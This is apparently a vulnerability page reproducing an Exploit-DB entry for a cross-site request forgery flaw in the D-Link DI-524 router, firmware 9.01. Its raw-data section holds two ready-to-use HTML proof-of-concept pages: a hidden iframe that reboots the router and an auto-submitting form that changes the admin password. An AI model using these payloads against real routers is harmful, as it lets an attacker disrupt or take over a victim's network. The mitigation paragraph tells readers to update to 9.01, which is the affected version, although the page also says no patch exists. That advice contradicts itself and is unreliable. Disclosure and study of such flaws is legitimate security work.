D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability

vendor:

D-Link DI-524 Wireless 150

by:

Felipe Soares de Souza

7.5

CVSS

HIGH

Cross-Site-Request-Forgery

352

CWE

Product Name: D-Link DI-524 Wireless 150

Affected Version From: Firmware 9.01

Affected Version To:

Patch Exists: NO

Related CWE:

CPE: h:d-link:di-524

Metasploit:

Other Scripts:

Platforms Tested:

2016

D-Link DI-524 – Cross-Site-Request-Forgery Vulnerability

This vulnerability allows an attacker to perform unauthorized actions on the D-Link DI-524 Wireless 150 router. The exploit consists of two parts: one to reboot the device and another to change the admin account. The first part sends a request to the router's web interface to reboot it, while the second part changes the admin account credentials without the user's consent.

Mitigation:

To mitigate this vulnerability, users should ensure they are running the latest firmware version (9.01) provided by D-Link. It is also recommended to change the default admin credentials and regularly monitor the router's logs for any suspicious activity.

Source

Exploit-DB raw data:

Title: D-Link DI-524 - Cross-Site-Request-Forgery Vulnerability
Credit: Felipe Soares de Souza
Date: 09/12/2016
Vendor: D-Link
Product: D-Link DI-524 Wireless 150
Product link: https://dlink.com.br/produto/di-524150
Version: Firmware 9.01


1- Reboot the device
	<html>
		<head>
			<title>CSRF - Reboot the device</title>
		</head>
		<body>
			<iframe width="1" height="1" src="http://192.168.0.1/cgi-bin/dial?rc=@&A=H&M=0&T=2000&rd=status"> </iframe>
		</body>
	</html>


2- Change admin account

	<html>
		<head>
			<title>CSRF - Change admin account</title>
		</head>
		<body>
			<form method="POST" action="http://192.168.1.1/cgi-bin/pass">
				<input type="hidden" name="rc" value="@atbox">
				<input type="hidden" name="Pa" value="attacker">
				<input type="hidden" name="p1" value="attacker">
			</form>

			<script type="text/javascript">
				document.forms[0].submit();
			</script>
		</body>
	</html>